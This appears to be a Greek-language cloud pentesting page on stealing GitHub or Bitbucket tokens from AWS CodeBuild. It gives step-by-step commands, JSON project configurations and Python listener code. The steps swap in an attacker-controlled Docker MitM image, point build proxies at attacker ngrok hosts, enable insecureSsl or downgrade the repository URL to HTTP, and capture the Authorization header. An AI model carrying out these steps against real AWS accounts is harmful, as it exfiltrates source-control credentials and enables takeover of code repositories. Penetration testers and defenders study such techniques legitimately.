AWS Codebuild - Token Leakage

Ανάκτηση Ρυθμισμένων Tokens Github/Bitbucket

Πρώτα, ελέγξτε αν υπάρχουν οποιαδήποτε διαπιστευτήρια πηγής ρυθμισμένα που θα μπορούσατε να διαρρεύσετε:

aws codebuild list-source-credentials

Via Docker Image

Αν διαπιστώσετε ότι η αυθεντικοποίηση για παράδειγμα στο Github είναι ρυθμισμένη στον λογαριασμό, μπορείτε να exfiltrate αυτήν την access (GH token ή OAuth token) κάνοντάς το Codebuild να χρησιμοποιήσει μια συγκεκριμένη εικόνα docker για να εκτελέσει την κατασκευή του έργου.

Για αυτόν τον σκοπό μπορείτε να δημιουργήσετε ένα νέο έργο Codebuild ή να αλλάξετε το περιβάλλον ενός υπάρχοντος για να ρυθμίσετε την εικόνα Docker.

Η εικόνα Docker που μπορείτε να χρησιμοποιήσετε είναι https://github.com/carlospolop/docker-mitm. Αυτή είναι μια πολύ βασική εικόνα Docker που θα ρυθμίσει τις env μεταβλητές https_proxy, http_proxy και SSL_CERT_FILE. Αυτό θα σας επιτρέψει να παγιδεύσετε το μεγαλύτερο μέρος της κίνησης του host που υποδεικνύεται στο https_proxy και http_proxy και να εμπιστευτείτε το SSL CERT που υποδεικνύεται στο SSL_CERT_FILE.

1. Create & Upload your own Docker MitM image

• Ακολουθήστε τις οδηγίες του repo για να ρυθμίσετε τη διεύθυνση IP του proxy σας και να ρυθμίσετε το SSL cert σας και να κατασκευάσετε την εικόνα docker.

• ΜΗ ΡΥΘΜΙΣΕΤΕ το http_proxy για να μην παγιδεύσετε αιτήματα προς το endpoint μεταδεδομένων.

• Μπορείτε να χρησιμοποιήσετε ngrok όπως ngrok tcp 4444 για να ρυθμίσετε το proxy στον host σας.

• Μόλις έχετε κατασκευάσει την εικόνα Docker, ανεβάστε την σε ένα δημόσιο repo (Dockerhub, ECR...)

1. Set the environment

• Δημιουργήστε ένα νέο έργο Codebuild ή τροποποιήστε το περιβάλλον ενός υπάρχοντος.

• Ρυθμίστε το έργο να χρησιμοποιεί την προηγουμένως παραγόμενη εικόνα Docker.

1. Set the MitM proxy in your host

• Όπως υποδεικνύεται στο Github repo μπορείτε να χρησιμοποιήσετε κάτι σαν:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

1. Εκτέλεση της κατασκευής & καταγραφή των διαπιστευτηρίων

• Μπορείτε να δείτε το token στην κεφαλίδα Authorization:

Αυτό θα μπορούσε επίσης να γίνει από το aws cli με κάτι σαν

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Μέσω insecureSSL

Codebuild έργα έχουν μια ρύθμιση που ονομάζεται insecureSsl που είναι κρυμμένη στο διαδίκτυο και μπορείτε να την αλλάξετε μόνο μέσω του API. Ενεργοποιώντας αυτό, επιτρέπει στο Codebuild να συνδεθεί με το αποθετήριο χωρίς να ελέγχει το πιστοποιητικό που προσφέρεται από την πλατφόρμα.

• Πρώτα πρέπει να καταγράψετε την τρέχουσα ρύθμιση με κάτι σαν:

aws codebuild batch-get-projects --name <proj-name>

• Στη συνέχεια, με τις συγκεντρωμένες πληροφορίες μπορείτε να ενημερώσετε τις ρυθμίσεις του έργου insecureSsl σε True. Ακολουθεί ένα παράδειγμα της ενημέρωσής μου για ένα έργο, παρατηρήστε το insecureSsl=True στο τέλος (αυτό είναι το μόνο που χρειάζεται να αλλάξετε από τη συγκεντρωμένη διαμόρφωση).

• Επιπλέον, προσθέστε επίσης τις μεταβλητές περιβάλλοντος http_proxy και https_proxy που δείχνουν στο tcp ngrok σας όπως:

aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'

• Στη συνέχεια, εκτελέστε το βασικό παράδειγμα από https://github.com/synchronizing/mitm στην θύρα που υποδεικνύεται από τις μεταβλητές proxy (http_proxy και https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Τέλος, κάντε κλικ στο Build the project, τα credentials θα σταλούν σε καθαρό κείμενο (base64) στη θύρα mitm:

Μέσω πρωτοκόλλου HTTP

Ένας επιτιθέμενος με υψηλά δικαιώματα σε έναν CodeBuild θα μπορούσε να διαρρεύσει το token Github/Bitbucket που έχει ρυθμιστεί ή αν τα δικαιώματα είχαν ρυθμιστεί μέσω OAuth, το ** προσωρινό OAuth token που χρησιμοποιείται για την πρόσβαση στον κώδικα**.

• Ένας επιτιθέμενος θα μπορούσε να προσθέσει τις μεταβλητές περιβάλλοντος http_proxy και https_proxy στο έργο CodeBuild που να δείχνουν στη μηχανή του (για παράδειγμα http://5.tcp.eu.ngrok.io:14972).

• Στη συνέχεια, αλλάξτε τη διεύθυνση URL του αποθετηρίου github για να χρησιμοποιεί HTTP αντί για HTTPS, για παράδειγμα: http://github.com/carlospolop-forks/TestActions

• Στη συνέχεια, εκτελέστε το βασικό παράδειγμα από https://github.com/synchronizing/mitm στη θύρα που υποδεικνύεται από τις μεταβλητές proxy (http_proxy και https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Τέλος, κάντε κλικ στο Build the project, τα credentials θα σταλούν σε καθαρό κείμενο (base64) στην θύρα mitm: